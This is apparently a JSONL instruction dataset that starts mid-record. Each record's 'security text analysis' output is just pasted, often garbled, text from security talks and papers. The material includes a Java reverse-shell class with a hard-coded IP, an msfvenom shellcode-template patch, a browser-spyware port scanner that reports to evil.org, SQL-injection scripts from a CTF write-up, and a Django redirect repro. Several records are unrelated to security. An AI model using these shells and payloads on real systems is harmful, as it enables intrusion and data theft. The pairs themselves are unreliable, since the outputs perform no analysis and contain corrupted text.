indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Django < 2.0.8 任意URL跳转漏洞CVE-2018-14574 Django默认配置下如果匹配上的URL路由中最后一位是/而用户访问的时候没加/Django默认会跳转到带/的请求中由配置项中的`django.middleware.common.CommonMiddleware``APPEND_SLASH`来决定 在path开头为`//example.com`的情况下Django没做处理导致浏览器认为目的地址是绝对路径最终造成任意URL跳转漏洞 该漏洞利用条件是目标`URLCONF`中存在能匹配上`//example.com`的规则 ## 漏洞环境 运行如下环境编译及运行一个基于django 2.0.7的网站 ``` docker compose build docker compose up -d ``` 环境启动后访问`http://your-ip:8000`即可查看网站首页 ## 漏洞复现 访问`http://your-ip:8000//www.example.com`即可返回是301跳转到`//www.example.com/` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n没有0x0C的evil.so 为什么constructor 会在库加载的时候执行 static void before_main(void) __attribute__((constructor)); 像这种具有constructor属性的函数会在初始化时执行主要是通过.init / .init_array 实现(还有.fini_array 类似析构), 不同的平台/版本编译链接时处理不同详见宋教授的文章 .init, .ctors, and .init_array 落到文件内容层面ELF的Section中有一个类型为SHT_DYNAMIC (6) 的Section 其存储着动态链接信 息一般情况下name为 .dynamic 其中dynamic entries里的DT_INIT项存着一个偏移在加载时会与 l->l_addr 也就是elf的加载基址相加并 跳去执行 而DT_INIT_ARRAY则是当作reloc后的地址(也就是没有加基址的操作)直接跳转 in https://github.com/bminor/glibc/blob/glibc-2.34/elf/dl-init.c 55-72 if (ELF_INITFINI && l->l_info[DT_INIT] != NULL) DL_CALL_DT_INIT(l, l->l_addr + l->l_info[DT_INIT]->d_un.d_ptr, argc, argv, env); /* Next see whether there is an array with initialization functions. */ ElfW(Dyn) *init_array = l->l_info[DT_INIT_ARRAY]; if (init_array != NULL) { unsigned int j; unsigned int jm; ElfW(Addr) *addrs; jm = l->l_info[DT_INIT_ARRAYSZ]->d_un.d_val / sizeof (ElfW(Addr)); addrs = (ElfW(Addr) *) (init_array->d_un.d_ptr + l->l_addr); for (j = 0; j < jm; ++j) ((dl_init_t) addrs[j]) (argc, argv, env); } } change DT_INIT to DT_INIT_ARRAY 问题起因是需要文件内不能有:=空格 和 \\x09 \\x0c (aka. \\t \\f )  msfvenom生成的elf-so文件是通 过 /data/templates/src/elf/dll/elf_dll_x64_template.s 中的模板 模板大致就是elf头+两个segment+两个section其为了让so在加载时执行shellcode使用了DT_INIT不 幸的是DT_INIT的tag正好为0xC为了避免0xC我们可以换用DT_INIT_ARRAY 0x19 需要与 DT_INIT_ARRAYSZ 0x1B配合 修改思路是 1. 删掉.dynamic section中的DT_INIT项加入DT_INIT_ARRAY与DT_INIT_ARRAYSZ因为 DT_INIT_ARRAY需要指向指针数组的偏移存放的指针还需要经过reloc(如果存入0x192会直接跳到 0x192这个地址但是共享库加载到内存会从某个基址开始也就是base+0x192)我们可以复用下 面会被reloc的DT_STRTAB 0x5表项(指向了size为2的strtab section, 在模板中是shellcode之前的两 字节), 也就是图中0x158这个偏移的来源DT_INIT_ARRAYSZ 设置为一个指针的长度0x8 2. 因为DT_STRTAB指向的是shellcode再向前两字节默认是0x00,替换成0x90(NOP) 3. 最后把模板写死的两个长度0xDEADBEFF替换成真实文件长度 修改与生成 elf_dll_x64_template_init_array.s $ diff /usr/share/metasploit- framework/data/templates/src/elf/dll/elf_dll_x64_template.s ./elf_dll_x64_template_init_array.s 66,68c66,71 < ; DT_INIT < dq 0x0c < dq _start --- > ; DT_INIT_ARRAY > dq 0x19 > dq r5 > ; DT_INIT_ARRAYSZ > dq 0x1B >", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbstract This paper details an approach by which SQL injection is used to gain remote access to arbitrary files from the file systems of Netgear wireless routers. It also leverages the same SQL injection to exploit a buffer overflow in the Netgear routers, yielding remote, root-level access. It guides the reader from start to finish through the vulnerability discovery and exploitation process. In the course of describing several vulnerabilities, this paper presents effective investigation and exploitation techniques of interest to those analyzing SOHO routers and other embedded devices. SQL Injection to MIPS Overflows: Rooting SOHO Routers Zachary Cutlip, Tactical Network Solutions zcutlip@tacnetsol.com SQL Injection to MIPS Overflows: Rooting SOHO Routers Zachary Cutlip 1 Introduction In this paper I will demonstrate novel uses of SQL injection as an attack vector to exploit otherwise unexposed vulnerabilities. Additionally, I detail a number of zero-day remote vulnerabilities found in several popular Small Office/Home Office (SOHO) wireless routers manufactured by Netgear. In the course of explaining the vulnerabilities, I demonstrate how to pivot off of a SQL injection in order to achieve fully privileged remote system access via buffer overflow attack. I also make the case that the oft-forgotten SOHO router is among the most valuable targets on a home or corporate network. Traditionally, SQL injection attacks are regarded as a means of obtaining privileged access to data that would otherwise be inaccessible. An attack against a database that contains no valuable or sensitive data is easy to disregard. This is especially true in the case that the data is temporary and application- generated. I will show that such vulnerabilities may actually present new exploitation opportunities. Often, an application developer assumes that only his or her application will ever make modifications to the database in question. As a result, the application may fail to properly vali", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVulnerability Exchange: One Domain Account for More Than Exchange Server RCE Tianze Ding (@D1iv3) > whoami  Tianze Ding (@D1iv3)  Senior security researcher at Tencent Security Xuanwu Lab  Focusing on Active Directory Security / Red Team / Web Security  Reported some vulnerabilities to Microsoft, Apple, Google, etc.  Black Hat Asia / Black Hat USA Arsenal speaker  Exchange Server Attack Surface Overview  From a Domain Account to Arbitrary Mailbox Takeover  From a Domain Account to Exchange Server RCE  Lateral Movement & Privilege Escalation  Conclusion & Takeaways Agenda  One of the most famous mail servers in the world  Stores large amounts of sensitive corporate information  Emails, attachments, contacts, calendars  Why Microsoft Exchange Server ?  Highly integrated with Microsoft Active Directory  Authentication  Mailbox / User / Group management  Exchange Server configuration    High-privileged AD objects  Exchange Servers are installed by Enterprise Admins / Schema Admins /   The Exchange Windows Permissions group has WriteDACL right on the Domain object (fixed in 2019) Why Microsoft Exchange Server ? [1] https://docs.microsoft.com/en-us/exchange/plan-and-deploy/active-directory/ad-access?view=exchserver-2019 [2] https://docs.microsoft.com/en-us/exchange/plan-and-deploy/deploy-new-installations/install-mailbox-role?view=exchserver-2019 Exchange Server Attack Surface Overview  Client Access Services  HTTPS endpoints  POP3 / IMAP / SMTP  Unified Messaging  HTTPS endpoints  OWA, ECP  RPC, EWS, MAPI, API, ActiveSync, PowerShell, Auto Discover, OAB Architecture and Attack Surface  Most historical vulnerabilities exist in ASP.NET code running on IIS Server Historical Vulnerabilities IIS Server POP3 Exchange Server RPC ECP OWA EWS MAPI API Active Sync Power Shell Autodi scover OAB Front End HTTP Proxy IMAP SMTP UM Architecture and Attack Surface POP3 IMAP SMTP UM IIS Server Windows Server Exchange Server  Exchange Server Exchange Server Front End HTTP Proxy OWA/ECP/MA", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n安全测试中 一些有趣的姿势和技巧 Fresh business general template Applicable to enterprise introduction, summary report, sales marketing, chart data gdygdy ID gdygdy 程序猿转行安全 多年搬砖背锅经验目前在练习甩锅 曾经在多个SRC和漏洞平台打酱油 每天专心撸铁 自我介绍 聊些什么 测试中那些总被忽略的目标 目 标 哪些目标 APP 移动APP应用 微信 微信公众号小程序 QQ QQ公众号 支付宝 支付宝生活号小程序 移动APP来源 安卓应用市场 AppStore 苹果企业证书安装 iOS应用 App Store 同开发者旗下APP iOS应用 扩大目标范围 I. 子业务 II. 分公司 III. 收购的业务 IV.  微信 微信公众号+小程序 微信 微信 QQ QQ 搜索公众号 下方菜单以及消息 支付宝生活号 支付宝 支付宝小程序 生活号入口 总入口 搜索 结束 上面介绍的这些够了吧 01 社交功能 02 其他相关公众号 04  03 APP的不同版本 如何获得更多的目标 社交功能 其他相关公众号小程序 APP的不同版本 APP历史版本 其他版本 还有什么 几个解决问题的技巧 技 巧 技巧1 2 3 技巧1 2 3 技巧1 2 3 难题 解决办法 逆向思考 解决办法 思考结果 修改目标参数的上一步返回数据值 感谢观看", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n微信程序开发总结 - 1 微信程序开发总结 背景是程序了个依靠告就能被动赚钱前各头部商阿百 度头条也都推出了的程序 它们之间应该都同异所以我也花个星期研究了下程序开发做了个微信 程序 画个画这篇是程序开发总结开发过程中有些坑还是要记录下的最 后也说下我的程序的总结 开发 有个 uni-app说是套代码可以编译到 14 个平台说明程序间的规则都同 异我还是选择按照微信官的档开发 官档 程序的主要开发语是 JavaScript类似 vue 和 react 的写法之前有过前端的开发 经历学起来也较块 开发者具 第步安装开发者具 这个具看样是 vscode 魔改的起来还挺舒服 Hello World 程序新建完个项默认的件的就是个 hello world https://developers.weixin.qq.com/miniprogram/dev/framework/ https://developers.weixin.qq.com/miniprogram/dev/framework/quickstart/getstar t.html#安装开发具 微信程序开发总结 - 2 关于代码的构成参考 修改 pages\\index\\index.wxml 就能改变了 UI 框架 界渲染依靠 wxml+wxss和 html+css 样的式可以找个 UI 框架套套 歌关键词 微信小程序UI框架 我的是 vant 有档可以在线预览起来较舒服 安装参考 就 https://developers.weixin.qq.com/miniprogram/dev/framework/structure.html https://vant-contrib.gitee.io/vant-weapp/#/home https://vant-contrib.gitee.io/vant-weapp/#/quickstart 微信程序开发总结 - 3 个坑安装完后发现样式没剩下要清除缓存退出具重新打开下 在使某个组件的时候需要在对应的 json 中 usingComponents 添加组件的路径 相当于 import 了 路由 要写多个就在 app.json 规定的路由同时根据 json 的配置可以影响程 序的表头字和颜以及可以配置程序菜单程序菜单微信已经做好只需要配 置 json 就能使 https://developers.weixin.qq.com/miniprogram/dev/framework/config.html#全局 配置 微信程序开发总结 - 4 微信 API 记录微信带的常 apiapi 档 络请求 https://developers.weixin.qq.com/miniprogram/dev/api/base/wx.env.html https://developers.weixin.qq.com/miniprogram/dev/api/network/request/wx.requ est.html 微信程序开发总结 - 5 JavaScript 下载图 JavaScript 1 2 3 4 5 6 7 8 9 10 11 12 13 wx.request({ url: config.api + \"/banner\", data: {}, method: \"GET\", success(res) { that.setData({ banner: res.data, }) }, fail(res) { Toast.fail('首页获取失败请退出重试2'); } }) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 download(e) { let url = this.data.pic; wx.downloadFile({ url: url, success(downres) { wx.saveImageToPhotosAlbum({ filePath: downres.tempFilePath, success(res) { wx.showToast({ title: '下载成功', icon: 'success', duration: 1000 }) }, fail() { wx.showToast({ title: '下载文件失败', icon: 'error', duration: 1000 }) } }) }, fail() { wx.showToast({ 微信程序开发总结 - 6 微信户登陆并获取昵称户头像 户登陆获取昵称户头像是两个 api同时还要写个后端 api接受 wx.login 传的临时 token后端将它转换为统的 openid后端根据 op", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSuicide Risk Assessment and Intervention Tactics Amber Baldet Trigger Warning: Discussion of mental health, self-harm, substance use/abuse, trauma, suicide This won't be depressing. amberella@attrition.org @amberbaldet Today You Will Learn  Risk analysis profiling framework  Identifying clues & warning signs  Situational threat assessment  Volunteer & first responder procedure  How to talk to another human being Pffft, Qualifications  Online Suicide Hotline Volunteer  QPR Gatekeeper Instructor Training  Online Crisis & Suicide Intervention Specialist (OCSIS)  Crisis Intervention & Specialist in Suicide Prevention (CISSP) Thank You Alex Sotirov Meredith Patterson Nikita Myrcurial Chris Eng Josh Corman Jack Daniels Jericho Quine How I Got Here How I Got Here Contagion Exposure to suicide or suicidal behavior directly or indirectly (via media) influences others to attempt suicide. Were Doing it Wrong Responsible Journalism & Social Media Standards What We Should Say How We Should Say It \"Committed\" Instead, use \"completed\" or \"died by\" Suicide is never the result of a single factor or event Suicide is the result of extremely complex interactions between psychological, social, and medical problems Suicide results, most often, from a long history of problems Don't present suicide as a means to a certain end, a valid coping mechanism, or an understandable solution to a specific problem Don't make venerating statements out of context (e.g. \"She was a great kid with a bright future.\") Do temper coverage of displays of grief Do promote coping strategies and post links to prevention resources Our Community Selected Computer Science Suicides Alan Turing Klara Dan von Neumann Chris McKinstry Push Singh Jonathan James Sam Roweis Bill Zeller Len Sassaman Ilya Zhitomirskiy Charles Staples Stell Aaron Swartz Igal Koshevoy 1954, computation, cryptanalysis 1963, wrote ENIAC controls, MANIAC programmer 2006, artificial intelligence (mindpixel), VLT operator 2007, artificial intelligen", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 java环境修改字节码 @yzddmr6 从实习之后发现缺乏的东还有很多跟其他优秀的相还有很的差距所以最近直在学习 充电章也写的少了上次巅峰极客线下赛跟yan表哥了基起磕了聊了聊天结合当时的赛 情况回来之后想搓个蚁剑的后渗透插件今天想跟家分享下其中的个点java环境如何修改字 节码 在蚁剑改造计划之实现JSP句话中当时为了解决硬编码字节码的问题采了额外参数的式来传参 但是同时带来的问题就是键名的固定跟额外带来的编码问题很容易成为个特征 例如 蚁剑没有java环境所以没办法像冰蝎样调asm框架来修改字节码但是我们也不需要asm框架那么 强的功能实际上只需要修改其中的个字符串的值就可以了那么怎么实现呢这个要从字节码的结 构说起 这以As_Exploits中的jsp反弹shell的payload为例 前 正 需求 1 POST: ant=xxxxxxxxxxxxxxx&var1=/bin/bash&var2=whoami Java字节码结构 1 import java.io.*; 2 import java.net.Socket; 3 4 public class ShellReverseTCP extends Thread { 5 6 InputStream zj; 7 OutputStream sd; 8 public static String ip; 9 public static String port; 10 11 ShellReverseTCP(InputStream zj, OutputStream sd) { 12 this.zj = zj; 2 13 this.sd = sd; 14 } 15 16 public ShellReverseTCP() { 17 18 } 19 @Override 20 public boolean equals(Object obj){ 21 ip=\"targetIP\"; 22 port=\"targetPORT\"; 23 try { 24 RunShellReverseTCP(); 25 return true; 26 }catch (Exception e){ 27 return false; 28 } 29 30 } 31 32 public static void main(String[] args) { 33 ip=\"192.168.88.129\"; 34 port=\"9999\"; 35 ShellReverseTCP shellReverseTCP = new ShellReverseTCP(); 36 shellReverseTCP.RunShellReverseTCP(); 37 } 38 39 public void RunShellReverseTCP() { 40 try { 41 String ShellPath; 42 if (System.getProperty(\"os.name\").toLowerCase().index Of(\"windows\") == -1) { 43 ShellPath = new String(\"/bin/sh\"); 44 } else { 45 ShellPath = new String(\"cmd.exe\"); 46 } 47 48 Socket socket = new Socket(ip, Integer.parseInt(port) ); 49 Process process = Runtime.getRuntime().exec(ShellPath ); 3 main函数是调试的不管是equals函数我们的的就是把其中的targetIP跟targetPORT替换 为我们的标IP跟端 010editor打开编译后的字节码件查看 50 (new ShellReverseTCP(process.getInputStream(), socket .getOutputStream())).start(); 51 (new ShellReverseTCP(socket.getInputStream(), process .getOutputStream())).start(); 52 } catch (Exception e) { 53 } 54 } 55 56 57 public void run() { 58 BufferedReader yx = null; 59 BufferedWriter jah = null; 60 try { 61 yx = new BufferedReader(new InputStreamReader(this.zj )); 62 jah = new BufferedWriter(new ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhy are our tools terrible? George Hotz (geohot) (and a bit about other things) geohot pwnium  ab.__defineGetter__(\"byteLength\", function() { return 0xFFFFFFFC; });  spawn crosh with fake messages  send commands to crosh by spoofing the window id  try_touch_experiment %s command injection  race condition in mount to get root  magic symlinks to persist towelroot  CVE-2014-3153 found by comex, 6/7/14  futex() syscall, break out of Linux sandbox  (yes, this wouldve worked for pwnium)  towelroot, universal android root  Used by 50 million people tomcr00se My 2014 GDB is Terrible Think of the first time you used IDA now think of what is possible. Version Control QIRA Where was eip? DEMO qira.me Type Information SAT Solvers Rewind Forking Future of the Project Companies spend millions of dollars to make puzzles for me to solve But the puzzles are getting tedious and repetitive My 2015 Im retired from hacking Questions? https://soundcloud.com/tomcr00se https://github.com/BinaryAnalysisPlatform/qira", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFirefox Extension Spyware ant Hacks in Taiwan Conference 2008 Outline 1. 不安全的 Firefox extension 2. Firefox extension spyware 3. Firefox 3 準備好了嗎 不安全的 Firefox extension  FormSpy  著名的 Firefox extension spyware  2006/07 發現  偽裝成合法的 NumberedLinks 0.9  竊取信用卡卡號密碼網路銀行 PIN 碼 以及 ICQ, FTP, IMAP, POP3 的密碼  FFsniFF  於 extensions list 中隱藏自身  自動化將 Form( 表單 ) 內容經由 SMTP 傳遞  2006/12 支援 Firefox2; 2008/06 支援 Firefox3  Sage  RSS Reader  2006/09, Cross-Zone Scripting  Firebug  Javascript debugger  2007/04, Cross-Zone Scripting XPCOM 跨平台的安全性問題 (Windows, Linux, BSD, Mac OS) Firefox extension spyware 1. 釣魚網頁 2. 內部網路掃描 3. 追蹤瀏覽紀錄 4. 竊取 cookie 5. 自動化 CSRF 攻擊 6. FormSpy 7. ReadFile 8. Run Remote App/File 1. 釣魚網頁 Yahoo! 奇摩登錄網頁 Yahoo! 奇摩釣魚網頁 Demo <HTML> .... <a href=foo>foo</a> <a href=yahoo_login> 登入 </a> <a href=bar>bar</a> .... </HTML> 2. 內部網路掃描  繞過防火牆  探巡 Private IP Address  取得內部 IP  得知內網伺服器 IP 及伺服器資訊   等 SSH NetBIOS FTP HTTP 1 2 SSH NetBIOS FTP HTTP 1 3 2 Demo #1 IP range Scanning Send 38 status = \"\"; 39 function callback(target, port, status) { 40 new Image().src= \"http://evil.org/evil/scanLAN.php? target=\"+target+\"&port=\"+port+\"&status=\"+status; 41 }; 42 43 var AttackAPI = { 44 version: '0.1', 45 author: 'Petko Petkov (architect)', 46 homepage: 'http://www.gnucitizen.org', 47 modifyBy: 'Yi-Feng Tzeng' 48 }; New Image( ) Host down Port closed Host : Port Host up Port open error timeout 49 AttackAPI.PortScanner = {}; 50 AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) { 51 var timeout = (timeout == null)?2000:timeout; 52 53 var img = new Image(); 54 55 img.onerror = function () { 56 if (!img) return; 57 img = undefined; 58 callback(target, port, 'open'); 59 }; 60 61 img.onload = img.onerror; 62 img.src = 'http://' + target + ':' + port; 63 64 setTimeout(function () { 65 if (!img) return; 66 img = undefined; 67 callback(target, port, 'closed'); 68 }, timeout); 69 }; 70 AttackAPI.PortScanner.scanTarget = function (callback, target, ports, timeout) 71 { 72 for (p = 1; ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# No Identity For You * Category: SCADA * 200 Points * Solved by the JCTF Team ## Description > I don't want hackers to steal my identity so I added a firewall for my PLC! > > can you bypass it? > Host: scada-enip-fw.chal.intentsummit.org > > Port: 44818 ## Solution SCADA stands for *Supervisory control and data acquisition*: > Supervisory control and data acquisition (SCADA) is a control system architecture comprising computers, networked data communications and graphical user interfaces for high-level supervision of machines and processes. It also covers sensors and other devices, such as programmable logic controllers, which interface with process plant or machinery ([Source](https://en.wikipedia.org/wiki/SCADA)) The challenge port is 44818, and searching for it we find that it is used for \"[EtherNet/IP](https://en.wikipedia.org/wiki/EtherNet/IP)\": > EtherNet/IP (IP = Industrial Protocol) is an industrial network protocol that adapts the Common Industrial Protocol (CIP) to standard Ethernet. EtherNet/IP is one of the leading industrial protocols in the United States and is widely used in a range of industries including factory, hybrid and process. We can use a Python utility called [Cpppo](https://github.com/pjkundert/cpppo) to try and communicate with the with the controller over EtherNet/IP. From the description we know that we are searching for the \"identity\": ```console (user@kali)-[/media/sf_CTFs/intent/No_Identity_For_You] $ python3 -m cpppo.server.enip.client --list-identity -a scada-enip-fw.chal.intentsummit.org:44818 Traceback (most recent call last): File \"/usr/lib/python3.9/runpy.py\", line 197, in _run_module_as_main return _run_code(code, main_globals, None, File \"/usr/lib/python3.9/runpy.py\", line 87, in _run_code exec(code, run_globals) File \"/home/user/.local/lib/python3.9/site-packages/cpppo/server/enip/client.py\", line 2248, in <module> sys.exit( main() ) File \"/home/user/.local/lib/python3.9/site-packages/cpppo/server/enip/client.py\", line 2208,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n我的CS笔记之- In-memory Evasion 1 0x00 前言 周末温习了一下2018年CS的作者制作的In-memory Evasion的系列视频这是视频以前也是看过的 但是没有做笔记现在很多细节都有点模糊了学习一定要做笔记 In-memory Evasion主要有5个视频作者传到youtube的不能开启自动英文识别字幕于是我重新传 了一下https://www.youtube.com/watch?v=FeydRT3UTVE&list=PLI7tp5mNfPSbgSBc0VpCNh7t98vw JO0jv可以开启英文字幕作为一个会点哑巴英语的人这个字幕真的拯救了我目前国内技术资料比 以前是丰富了不少但是质量也普遍堪忧因此英文真的很重要 言归正转这5个视频其实可以分为4部分 讲述常见的内存侦测手法(Memory Detections)目前来看比较初级了 讲述CS里一个Payload的完整执行流程(A Payload's Life) 怎么使用CS逃逸这些侦测手法(Evasions) 如何来模拟一个APT组织的样本(Threat Emulation) 人们常见说以攻促防但是作为公鸡队要知道未知防焉知攻学习防御方的侦测手段才能 更好的提升公鸡技术 0x01 常见的侦测手法 作者主要使用process hacker这个工具从进程线程内存入手来侦测CS的payload因为CS大量 使用反射DLL实际上也就在内存中侦测这些反射dll我们先来process hacker打开process hacker选中一个进程查看属性首先是进程的各种信息 数字签名 命令行 当前目录 开始时间 PEB地址 父进程 保护策略 我们再看线程线程中我们主要关注的是开始地址和开始地址模块 Author: L.N. / Date: 2021-09-06 Produced by AttackTeamFamily No. 1 / 4 - Welcome to www.red-team.cn 最后就是内存主要关注的还是基址内存大小内存权限ReadWriteExecute内存作用 堆栈PEB文件....: 知道了这些我们的侦测手法主要是3种 线程开始地址 正常的线程开始地址是有一个模块的正常的DLL映射到内存中是有模块名称而注入进去 的DLL就没有模块名称 Author: L.N. / Date: 2021-09-06 Produced by AttackTeamFamily No. 2 / 4 - Welcome to www.red-team.cn 内存权限 正常情况下内存属性基本没有RWX的情况RWX常常被公鸡工具使用 内存内容 这个比较常见就是提权beacon.dll的一些特征在内存中去匹配常见的就是使用各种yara 规则 匹配dos头pe头 各种字符串 代码中的一些函数等等 内存检测工具主要分为2种模式 一次性扫描常见的就是一些溯源工具蓝队同学使用这些工具在受害机器上快速寻找植入体 长久驻留的杀毒软件 有Agent长期驻留 事件驱动有新进程新线程启动的时候扫一扫 关联分析 主动防御 常见的侦测工具的侦测点 反射注入侦测 MZ头 Author: L.N. / Date: 2021-09-06 Produced by AttackTeamFamily No. 3 / 4 - Welcome to www.red-team.cn RWX内存 内存没有和一个模块关联 Get-InjectedThread.ps1工具 线程开始地址没有和一个模块关联 LOKI工具 扫描文件用yara规则 0x02 总结 这个就是In-memory Evasion 1这个视频主要是讲一些简单的进程线程内存的知识以及process hacker的基本使用然后就是cs在内存种的异常指标以及检测这些异常的工具的原理目前来会看 是比较基础的内存侦测手法万丈高楼从地起扎实的地基非常重要作者还推荐了一些其他资料 书籍The Art memory Forensics PPTAdvanced Attack Detection (william Burgess and Matt watkins) Author: L.N. / Date: 2021-09-06 Produced by AttackTeamFamily No. 4 / 4 - Welcome to www.red-team.cn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 The Journey Of Hunting ITW Windows LPE 0day Quan Jin <twitter: @jq0904> DBAPPSecurity Black Hat USA 2022 Contents The Journey Of Hunting ITW Windows LPE 0day ....................................................................................1 Abstract..........................................................................................................................................................1 Background ..................................................................................................................................................2 Is it possible to catch an itw LPE 0day? ..............................................................................................2 Learn from history (and now) .................................................................................................................3 Why should we learn from history ..............................................................................................3 How we study historical cases ......................................................................................................3 Why should we learn from now ...................................................................................................4 One road leads to Rome .........................................................................................................................4 Choose the right tool .......................................................................................................................4 Build the right rule ............................................................................................................................6 Build a workable system .................................................................................................................7 Test and improve the system ........................................................................................................8 Results ........................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n不不可能完成的任务 从用户空间窃取内核数据 Yueqiang Cheng, Zhaofeng Chen, Yulong Zhang, Yu Ding, Tao Wei Baidu Security 关于演讲者 Dr. Tao Wei Dr.$Yueqiang$Cheng$ Mr. Zhaofeng Chen Mr. Yulong Zhang Dr. Yu Ding 我们的安全项目: 怎样从用户空间读取未授权的内核数据? $$ 强有力力的内核-用户隔离 (KUI) MMU-页表(Page Table)的加持 这为什什么很难? 假设内核无缺陷: 无内核缺陷来任意的读取内核数据 KUI里里的内存访问 查询TLB 截取页表 更更新TLB 保护检查 查询失败 查询成功 拒绝 准许 保护失败 SIGSEGV 物理理地址 虚拟地址 权限检查 2: 控制暂存器器, 例例如, SMAP in CR4 1: 页表许可 Image from Intel sdm 1. 非特权应用程序+ 2. KUI 权限检查+ 3. 无缺陷内核 无计可施? 但, 为了了获得高性能的 CPU  1. 非特权应用程序+ 2. 权限检查+ 3. 无缺陷内核 高性能 推测执行行+ 无序执行行 投机执行行 S$ F$ T$ E$ 无推测执行行 错误预测 正确预测 无序执行行 Images$are$from$Dr.$Lihu$Rappoport$ 例例子 有序执行行 无序执行行 数据流图 推测执行行 + 无序执行行 够了了么? 不不够!!! 延迟的权限检查+ 缓存副作用 权限检查延迟到注销 单元 Image$from$https://www.cse.msu.edu/~enbody/postrisc/postrisc2.htm$ 前端分支预测器器服务 于推测执行行 执行行引擎以无序 方式执行行 缓存中的副作用 仍然存在!!! 1. 攻击者选择的无法访问的内存位置的内容将加 载到寄存器器中 指向目标内核地址 Meltdown v3的工 作原理理 Meltdown v3的工 作原理理 2. 临时指令根据寄存器器的秘密内容访问缓存线 将数据放入缓 存 这个数字应该 >= 0x6 3. 攻击者使用flush+reload来确定访问的缓存线从 而确定存储在所选内存位置的秘密 阵列列基 256槽 0$ 1$ 2$ 254$ 255$ 所选索引是目标字节的值 例例如如果所选索引为0x65则值为A Meltdown v3的工 作原理理 ForeShadow 把秘密放在一级 取消映射页表条目 Meltdown $$ Spectrev1/v2怎么样 Sepctrev1 的工作原理理 1. 在设置阶段, 处理理器器被错误的训练去做出 一个可被利利用 的错误的推测 例例如 x < array1_size 指向目标地址 阵列列2的槽索引 泄漏漏数据 真正的执行行流程和 推测执行行在这里里 2. 处理理器器推测地将来自目标上下文的指令执行行到微体系结构 的隐蔽通道中例例如, x > array1_size 执行行流程应该 在这里里 推测执行行在这 里里! 将array2的一个槽加载到 缓存中 Sepctrev1 的工作原理理 3: 可以通过定时访问CPU缓存中的内存地址来恢复敏敏感 数据 Array2基类 256槽 0 1 2 254 255 所选索引是目标字节的值例例如, 如果所选索引是 0x66, 那对应值就是B Sepctre v1的工 作原理理 Sepctre如何读取内核数据 array1+x 指向秘 密 ü array1和array2在用户空间中 ü x 由对方控制 array2槽索引 泄漏漏内核数据 1. 非特权应用程序+ 2. 权限检查+ 3. 无缺陷内核 耶! 我们现在得到内核数据了了 SMA P Spectre (Gadget in Kernel Space) 但是... KPTI Meltdown Spectre (Gadget in User 内核空 间 PCID有助于提高性能 KPTI之前 用户空 间 内核空 间 用户空 间 内核空 间 用户空 间 KPTI之后 用户内核模式 内核模式 用户模式 KPTI 即使我们把Spectre组件放进 内核空间 SMAP也会阻止它 SMAP 监督者模式 (内核空间) 用户模式 (用户空间) ü 当CR4中的SMAP位被设置时SMAP将被启 用 ü 通过对EFLAGS.AC标志的设置可临时禁用 SMAP ü SMAP检查早在退役甚至执行行之前就已经完 成了了 攻击和规避总结 技术 窃取内核 数据? 规避 规避之后, 内核数据泄 漏漏? Spectre 成功 KPTI + SMAP 失败 Meltdown 成功 KPTI 失败 ForeShadow ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nXCTF-WP AuthorNu1L Team XCTF-WP WEB easy_trick_gzmtu webct webtmp hackme baby_java fmkq dooog nweb PHP-UAF sqlcheckin nothardweb happyvacation GuessGame hardphp Crypto NHP lancet Misc ez_mem&usb MISC Apk GetFlag Pwn Shotest_Path_v2 twochunk musl lgd easyheap woodenbox easy_unicorn bjut Kernoob EasyVM babyhacker babyhacker2 rustpad Re clock cycle graph baby_wasi fxck! Rubik easyparser OwnerMoney WEB easy_trick_gzmtu admin 20200202goodluckurl eGlhb2xldW5n check.php eGlhb2xldW5nLnBocA==.php , file://localhost/var/www/html/eGlhb2xldW5n/eGlhb2xldW5nLnBocA==.php import requests import re from string import lowercase # payload = \"union select 1,(select group_concat(concat_ws(0x23,username,passwd,url)) from trick.admin), 1 %23\" payload = r\"union select 1,(select @@global.secure_file_priv), 1 %23\" # payload = \"union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='trick' and table_name='admin'), 1 %23\" url = r'http://121.37.181.246:6333/?time=123%27%20' for i in payload: if i in lowercase: url += '\\\\' + i else: url += i print url res = requests.get(url).text print res print re.search(r'<div class=\"text-c \">(.*?)</div>', res).groups()[0] <?php class trick{ public $gf; public function content_to_file($content){ $passwd = $_GET['pass']; if(preg_match('/[a-z]+\\.passwd$/m',$passwd)) { if(strpos($passwd,\"20200202\")){ echo file_get_contents(\"/\".$content); } } } public function aiisc_to_chr($number){ 